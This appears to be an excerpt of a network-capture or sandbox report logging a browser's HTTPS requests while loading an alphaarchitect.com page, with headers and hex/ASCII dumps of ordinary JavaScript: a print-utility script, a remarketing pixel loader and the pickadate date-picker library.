                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-9c26"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9dfabc943d6-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC877INData Raw: 37 64 63 35 0d 0a 76 61 72 20 63 6f 6d 6d 6f 6e 55 74 69 6c 73 3d 7b 68 61 73 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 6e 6f 64 65 2c 63 6c 61 73 73 4e 61 6d 65 29 7b 69 66 28 6e 6f 64 65 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 4e 6f 64 65 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 29 7b 72 65 74 75 72 6e 21 31 7d 0a 69 66 28 6e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 29 7b 72 65 74 75 72 6e 20 6e 6f 64 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 63 6c 61 73 73 4e 61 6d 65 29 7d 0a 76 61 72 20 63 6c 61 73 73 4e 61 6d 65 73 3d 28 6e 6f 64 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6c 61 73 73 27 29 7c 7c 27 27 29 2e 73 70 6c 69 74 28 2f 5c 73 2f 29 3b 72 65 74 75 72 6e 20 63 6c 61 73 73 4e 61 6d 65 73 2e 69 6e 64 65 78 4f 66 28 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: 7dc5var commonUtils={hasClass:function(node,className){if(node.nodeType!==Node.ELEMENT_NODE){return!1}if(node.classList){return node.classList.contains(className)}var classNames=(node.getAttribute('class')||'').split(/\s/);return classNames.indexOf(cl
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 74 49 6d 61 67 65 57 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 69 6d 67 2c 6f 6e 53 65 72 76 65 72 29 7b 69 66 28 69 6d 67 2e 6a 71 75 65 72 79 29 7b 69 6d 67 3d 69 6d 67 5b 30 5d 7d 0a 76 61 72 20 72 65 73 75 6c 74 3d 6e 75 6c 6c 3b 69 66 28 6f 6e 53 65 72 76 65 72 29 7b 76 61 72 20 70 66 44 61 74 61 57 69 64 74 68 3d 69 6d 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 70 66 2d 64 61 74 61 2d 77 69 64 74 68 27 29 7c 7c 69 6d 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 70 66 5f 72 65 63 74 5f 77 69 64 74 68 27 29 3b 69 66 28 70 66 44 61 74 61 57 69 64 74 68 29 7b 72 65 73 75 6c 74 3d 70 61 72 73 65 49 6e 74 28 70 66 44 61 74 61 57 69 64 74 68 2c 31 30 29 7d 7d 65 6c 73 65 20 69 66 28 69 6d 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28
                                                                                                                                                                                                                                                                        Data Ascii: tImageWidth:function(img,onServer){if(img.jquery){img=img[0]}var result=null;if(onServer){var pfDataWidth=img.getAttribute('pf-data-width')||img.getAttribute('data-pf_rect_width');if(pfDataWidth){result=parseInt(pfDataWidth,10)}}else if(img.getAttribute(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 49 54 59 3a 31 30 30 30 30 30 30 2c 67 65 74 53 76 67 49 6d 61 67 65 57 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 73 76 67 2c 6f 6e 53 65 72 76 65 72 29 7b 76 61 72 20 72 65 73 75 6c 74 3d 74 68 69 73 2e 67 65 74 49 6d 61 67 65 57 69 64 74 68 28 73 76 67 2c 6f 6e 53 65 72 76 65 72 29 7c 7c 74 68 69 73 2e 49 4e 46 49 4e 49 54 59 3b 76 61 72 20 6d 61 78 56 61 6c 75 65 3d 74 68 69 73 2e 73 76 67 4d 61 78 56 61 6c 75 65 28 73 76 67 29 3b 76 61 72 20 76 69 65 77 42 6f 78 56 61 6c 75 65 3d 74 68 69 73 2e 73 76 67 56 69 65 77 42 6f 78 28 73 76 67 29 2e 77 69 64 74 68 7c 7c 74 68 69 73 2e 49 4e 46 49 4e 49 54 59 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 69 6e 28 72 65 73 75 6c 74 2c 6d 61 78 56 61 6c 75 65 2c 76 69 65 77 42 6f 78 56 61 6c 75 65 29 7d 2c 67 65 74
                                                                                                                                                                                                                                                                        Data Ascii: ITY:1000000,getSvgImageWidth:function(svg,onServer){var result=this.getImageWidth(svg,onServer)||this.INFINITY;var maxValue=this.svgMaxValue(svg);var viewBoxValue=this.svgViewBox(svg).width||this.INFINITY;return Math.min(result,maxValue,viewBoxValue)},get
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 45 4d 45 4e 54 53 29 7c 7c 24 28 6e 6f 64 65 29 2e 66 69 6e 64 28 27 2a 3a 76 69 73 69 62 6c 65 27 29 2e 6c 65 6e 67 74 68 3c 3d 4d 41 4e 59 5f 45 4c 45 4d 45 4e 54 53 5f 54 48 52 45 53 48 4f 4c 44 29 29 7d 7d 29 28 29 2c 72 65 73 69 7a 65 49 6d 61 67 65 43 73 73 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 76 61 6c 75 65 29 7b 72 65 74 75 72 6e 27 70 66 2d 73 69 7a 65 2d 27 2b 76 61 6c 75 65 2e 72 65 70 6c 61 63 65 28 27 2d 73 69 7a 65 27 2c 27 27 29 2e 72 65 70 6c 61 63 65 28 27 2d 69 6d 61 67 65 73 27 2c 27 27 29 7d 2c 61 64 64 43 53 53 3a 66 75 6e 63 74 69 6f 6e 28 63 73 73 2c 64 6f 63 2c 75 73 65 42 6f 64 79 29 7b 76 61 72 20 74 61 67 4e 61 6d 65 3d 75 73 65 42 6f 64 79 3f 27 62 6f 64 79 27 3a 27 68 65 61 64 27 3b 76 61 72 20 65 6c 65 6d 65 6e 74 3d
                                                                                                                                                                                                                                                                        Data Ascii: EMENTS)||$(node).find('*:visible').length<=MANY_ELEMENTS_THRESHOLD))}})(),resizeImageCssClass:function(value){return'pf-size-'+value.replace('-size','').replace('-images','')},addCSS:function(css,doc,useBody){var tagName=useBody?'body':'head';var element=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 61 2e 63 6f 6e 66 69 67 2e 68 6f 73 74 73 2e 63 64 6e 3b 69 66 28 75 72 6c 2e 69 6e 64 65 78 4f 66 28 63 64 6e 50 72 65 66 69 78 29 3d 3d 3d 30 29 7b 72 65 74 75 72 6e 20 75 72 6c 7d 0a 72 65 74 75 72 6e 20 63 64 6e 50 72 65 66 69 78 2b 75 72 6c 7d 3b 76 61 72 20 70 65 72 73 69 73 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 73 41 6e 64 52 65 63 74 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 53 54 59 4c 45 53 5f 54 4f 5f 53 41 56 45 3d 5b 27 64 69 73 70 6c 61 79 27 2c 27 76 69 73 69 62 69 6c 69 74 79 27 5d 3b 76 61 72 20 52 45 43 54 5f 54 4f 5f 53 41 56 45 3d 5b 27 77 69 64 74 68 27 2c 27 68 65 69 67 68 74 27 5d 3b 76 61 72 20 50 52 45 46 49 58 3d 27 70 66 27 3b 66 75 6e 63 74 69 6f 6e 20 70 65 72 73 69 73 74 4f 62 6a 65 63 74 28 6e 6f 64 65 2c 6f 62
                                                                                                                                                                                                                                                                        Data Ascii: a.config.hosts.cdn;if(url.indexOf(cdnPrefix)===0){return url}return cdnPrefix+url};var persistComputedStylesAndRect=(function(){var STYLES_TO_SAVE=['display','visibility'];var RECT_TO_SAVE=['width','height'];var PREFIX='pf';function persistObject(node,ob
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 73 57 69 74 68 28 27 23 27 29 29 7b 72 65 74 75 72 6e 20 73 72 63 7d 65 6c 73 65 20 69 66 28 61 62 73 6f 6c 75 74 65 55 72 6c 52 65 67 65 78 70 2e 74 65 73 74 28 73 72 63 29 29 7b 72 65 74 75 72 6e 20 73 72 63 7d 65 6c 73 65 20 69 66 28 73 72 63 2e 73 74 61 72 74 73 57 69 74 68 28 27 2f 2f 27 29 29 7b 72 65 74 75 72 6e 20 70 66 43 6f 6e 66 69 67 4c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 73 72 63 7d 65 6c 73 65 7b 76 61 72 20 69 6d 61 67 65 44 6f 6d 61 69 6e 3d 70 66 43 6f 6e 66 69 67 4c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 2f 2f 27 2b 70 66 43 6f 6e 66 69 67 4c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 21 73 72 63 2e 73 74 61 72 74 73 57 69 74 68 28 27 2f 27 29 29 7b 73 72 63 3d 27 2f 27 2b 73 72 63 7d 0a 72 65 74 75 72
                                                                                                                                                                                                                                                                        Data Ascii: sWith('#')){return src}else if(absoluteUrlRegexp.test(src)){return src}else if(src.startsWith('//')){return pfConfigLocation.protocol+src}else{var imageDomain=pfConfigLocation.protocol+'//'+pfConfigLocation.host;if(!src.startsWith('/')){src='/'+src}retur
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 6e 20 77 69 6e 64 6f 77 7d 3b 77 69 6e 64 6f 77 4d 61 70 70 69 6e 67 73 2e 63 6f 72 65 3d 63 6f 72 65 57 69 6e 64 6f 77 3b 77 69 6e 64 6f 77 4d 61 70 70 69 6e 67 73 2e 61 6c 67 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 69 6e 64 46 72 61 6d 65 57 69 6e 64 6f 77 28 27 61 6c 67 6f 27 2c 63 6f 72 65 57 69 6e 64 6f 77 28 29 29 7d 3b 62 72 65 61 6b 7d 0a 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 4d 61 70 70 69 6e 67 73 5b 6e 61 6d 65 5d 28 29 7d 0a 72 65 74 75 72 6e 7b 70 6f 73 74 4d 65 73 73 61 67 65 3a 66 75 6e 63 74 69 6f 6e 28 64 65 73 74 69 6e 61 74 69 6f 6e 2c 74 79 70 65 2c 70 61 79 6c 6f 61 64 2c 6f 6e 45 72 72 6f 72 29 7b 76 61 72 20 64 65 73 74 69 6e 61 74 69 6f 6e 57 69 6e 64 6f 77 3d 66 69 6e 64 44 65 73 74 69 6e 61 74 69 6f 6e 57
                                                                                                                                                                                                                                                                        Data Ascii: n window};windowMappings.core=coreWindow;windowMappings.algo=function(){return findFrameWindow('algo',coreWindow())};break}return windowMappings[name]()}return{postMessage:function(destination,type,payload,onError){var destinationWindow=findDestinationW
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 2e 63 61 6c 6c 28 63 6f 6e 73 6f 6c 65 5b 66 75 6e 63 74 69 6f 6e 4e 61 6d 65 5d 2c 63 6f 6e 73 6f 6c 65 29 7d 0a 72 65 74 75 72 6e 20 72 65 73 75 6c 74 7d 29 28 29 3b 76 61 72 20 70 66 52 65 64 69 72 65 63 74 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 70 66 48 6f 73 74 2c 75 73 65 72 53 65 74 74 69 6e 67 73 2c 75 72 6c 29 7b 76 61 72 20 63 6f 6d 70 6f 6e 65 6e 74 73 3d 5b 27 73 6f 75 72 63 65 3d 63 73 27 2c 27 75 72 6c 3d 27 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 72 6c 29 5d 3b 66 6f 72 28 76 61 72 20 63 6f 6e 66 69 67 20 69 6e 20 75 73 65 72 53 65 74 74 69 6e 67 73 29 7b 76 61 72 20 73 65 74 74 69 6e 67 3d 75 73 65 72 53 65 74 74 69 6e 67 73
                                                                                                                                                                                                                                                                        Data Ascii: .prototype.bind.call(console[functionName],console)}return result})();var pfRedirect=(function(){return function(pfHost,userSettings,url){var components=['source=cs','url='+encodeURIComponent(url)];for(var config in userSettings){var setting=userSettings
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 79 70 65 3a 27 73 65 6c 65 63 74 6f 72 27 2c 76 61 6c 75 65 3a 76 61 6c 75 65 7d 7d 7d 7d 7d 0a 72 65 74 75 72 6e 20 72 65 73 75 6c 74 7d 3b 72 65 74 75 72 6e 7b 73 65 6c 65 63 74 6f 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 65 73 75 6c 74 3d 7b 7d 3b 76 61 72 20 6f 70 74 69 6f 6e 73 3d 70 72 69 6e 74 66 72 69 65 6e 64 6c 79 4f 70 74 69 6f 6e 73 28 29 3b 69 66 28 21 6f 70 74 69 6f 6e 73 29 7b 72 65 74 75 72 6e 20 72 65 73 75 6c 74 7d 0a 76 61 72 20 70 72 69 6e 74 66 72 69 65 6e 64 6c 79 4f 70 74 69 6f 6e 73 56 61 6c 75 65 3d 6f 70 74 69 6f 6e 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 73 65 6c 65 63 74 6f 72 73 27 29 7c 7c 6f 70 74 69 6f 6e 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: ype:'selector',value:value}}}}}return result};return{selectors:function(){var result={};var options=printfriendlyOptions();if(!options){return result}var printfriendlyOptionsValue=options.getAttribute('data-selectors')||options.getAttribute('data-conten
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 63 75 73 74 6f 6d 43 53 53 55 52 4c 29 7b 72 65 73 75 6c 74 2e 63 75 73 74 6f 6d 43 53 53 55 52 4c 3d 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 63 75 73 74 6f 6d 43 53 53 55 52 4c 2e 76 61 6c 75 65 7d 0a 69 66 28 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 44 46 29 7b 72 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 44 46 3d 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 44 46 2e 76 61 6c 75 65 7d 0a 69 66 28 70 61 72 73 65 64 41 74 74 72 69 62 75 74 65 52 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 72 69 6e 74 29 7b 72 65 73 75 6c 74 2e 64 69 73 61 62 6c 65 50 72 69 6e 74 3d 70 61 72
                                                                                                                                                                                                                                                                        Data Ascii: parsedAttributeResult.customCSSURL){result.customCSSURL=parsedAttributeResult.customCSSURL.value}if(parsedAttributeResult.disablePDF){result.disablePDF=parsedAttributeResult.disablePDF.value}if(parsedAttributeResult.disablePrint){result.disablePrint=par


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        51192.168.2.449806172.67.69.734435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC370OUTGET /px/smart/?c=2645100a8c95db0 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: a.remarketstats.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC872INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        X-Frontend: cc-nginx-5967c9b8fb-sx5vd:cc-nginx-5967c9b8fb-sx5vd
                                                                                                                                                                                                                                                                        X-Requestid: d5e62a59-1802-4a84-bd19-89889116b5f1
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tUVYWGTb%2B16PM79yzu3aDNpQEndJ3f68niFDMOFaPwnVGwn3qDNjt651jdmlePQf7t1cQhq%2B19IT1ZX0IJKL165H%2BlhKYmA1oW4pMb%2FTEs%2B811Pd7xKUBPU6UzdgqebIdOPV93w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9e11be418f6-EWR
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1500&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1928665&cwnd=211&unsent_bytes=0&cid=37e2039ee71aafd7&ts=581&x=0"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC497INData Raw: 32 65 36 0d 0a 28 66 75 6e 63 74 69 6f 6e 20 28 77 2c 20 64 29 20 7b 0a 20 20 76 61 72 20 64 79 6e 61 6d 69 63 50 69 78 65 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 70 69 78 65 6c 55 52 4c 20 3d 20 22 68 74 74 70 73 3a 2f 2f 61 2e 72 65 6d 61 72 6b 65 74 73 74 61 74 73 2e 63 6f 6d 2f 70 78 2f 73 6d 61 72 74 2f 3f 63 3d 32 36 34 35 31 30 30 61 38 63 39 35 64 62 30 26 73 65 67 3d 22 3b 0a 20 20 20 20 76 61 72 20 75 72 6c 50 61 74 68 20 3d 20 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 75 62 73 74 72 28 31 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 2b 24 2f 2c 20 27 27 29 3b 0a 20 20 20 20 69 66 20 28 75 72 6c 50 61 74 68 20 3d 3d 3d 20 22 22 29 20 7b 20 75 72 6c 50 61 74 68 20 3d 20 22 68 6f 6d 65 22 3b 20 7d
                                                                                                                                                                                                                                                                        Data Ascii: 2e6(function (w, d) { var dynamicPixel = function() { var pixelURL = "https://a.remarketstats.com/px/smart/?c=2645100a8c95db0&seg="; var urlPath = w.location.pathname.substr(1).replace(/\/+$/, ''); if (urlPath === "") { urlPath = "home"; }
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC252INData Raw: 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 0a 20 20 7d 3b 0a 0a 20 20 76 61 72 20 62 6f 64 79 20 3d 20 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 62 6f 64 79 27 29 5b 30 5d 3b 0a 20 20 69 66 20 28 62 6f 64 79 29 20 7b 0a 20 20 20 20 64 79 6e 61 6d 69 63 50 69 78 65 6c 28 29 3b 0a 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 64 79 6e 61 6d 69 63 50 69 78 65 6c 28 29 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 29 3b 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: d.getElementsByTagName('script')[0].parentNode.appendChild(script); }; var body = d.getElementsByTagName('body')[0]; if (body) { dynamicPixel(); } else { w.onload = function () { dynamicPixel(); } }})(window, document);
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        52192.168.2.449808141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:51 UTC808OUTGET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.date.min.js?ver=3.6.2 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-3122"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147808
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9e85c94c409-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC877INData Raw: 33 31 32 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 2e 2f 70 69 63 6b 65 72 22 2c 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 2e 2f 70 69 63 6b 65 72 2e 6a 73 22 29 2c 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 65 28 50 69 63 6b 65 72 2c 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 2c 70 29 7b 76 61 72 20 74 2c 79 3d 65 2e 5f 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 61 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 20 72 2e
                                                                                                                                                                                                                                                                        Data Ascii: 3122!function(e){"function"==typeof define&&define.amd?define(["./picker","jquery"],e):"object"==typeof exports?module.exports=e(require("./picker.js"),require("jquery")):e(Picker,jQuery)}(function(e,p){var t,y=e._;function a(t,a){function e(){return r.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 2c 6f 2c 7b 66 6f 72 6d 61 74 3a 73 2c 64 65 66 61 75 6c 74 56 61 6c 75 65 3a 21 30 7d 29 3a 69 2e 73 65 74 28 22 73 65 6c 65 63 74 22 2c 6e 75 6c 6c 29 2e 73 65 74 28 22 68 69 67 68 6c 69 67 68 74 22 2c 69 2e 69 74 65 6d 2e 6e 6f 77 29 2c 69 2e 6b 65 79 3d 7b 34 30 3a 37 2c 33 38 3a 2d 37 2c 33 39 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 29 3f 2d 31 3a 31 7d 2c 33 37 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 29 3f 31 3a 2d 31 7d 2c 67 6f 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 69 2e 69 74 65 6d 2e 68 69 67 68 6c 69 67 68 74 2c 74 3d 6e 65 77 20 44 61 74 65 28 74 2e 79 65 61 72 2c 74 2e 6d 6f 6e 74 68 2c 74 2e 64 61 74 65 2b 65 29 3b 69 2e 73 65 74 28 22 68 69 67 68 6c 69 67 68 74 22 2c 74 2c 7b
                                                                                                                                                                                                                                                                        Data Ascii: ,o,{format:s,defaultValue:!0}):i.set("select",null).set("highlight",i.item.now),i.key={40:7,38:-7,39:function(){return e()?-1:1},37:function(){return e()?1:-1},go:function(e){var t=i.item.highlight,t=new Date(t.year,t.month,t.date+e);i.set("highlight",t,{
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 2e 73 65 74 28 22 76 69 65 77 22 2c 65 2e 68 69 67 68 6c 69 67 68 74 2c 6e 29 3a 74 2e 6d 61 74 63 68 28 2f 5e 28 66 6c 69 70 7c 6d 69 6e 7c 6d 61 78 7c 64 69 73 61 62 6c 65 7c 65 6e 61 62 6c 65 29 24 2f 29 26 26 28 65 2e 73 65 6c 65 63 74 26 26 69 2e 64 69 73 61 62 6c 65 64 28 65 2e 73 65 6c 65 63 74 29 26 26 69 2e 73 65 74 28 22 73 65 6c 65 63 74 22 2c 65 2e 73 65 6c 65 63 74 2c 6e 29 2c 65 2e 68 69 67 68 6c 69 67 68 74 29 26 26 69 2e 64 69 73 61 62 6c 65 64 28 65 2e 68 69 67 68 6c 69 67 68 74 29 26 26 69 2e 73 65 74 28 22 68 69 67 68 6c 69 67 68 74 22 2c 65 2e 68 69 67 68 6c 69 67 68 74 2c 6e 29 29 2c 69 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 74 65 6d 5b 65 5d 7d
                                                                                                                                                                                                                                                                        Data Ascii: .set("view",e.highlight,n):t.match(/^(flip|min|max|disable|enable)$/)&&(e.select&&i.disabled(e.select)&&i.set("select",e.select,n),e.highlight)&&i.disabled(e.highlight)&&i.set("highlight",e.highlight,n)),i},a.prototype.get=function(e){return this.item[e]}
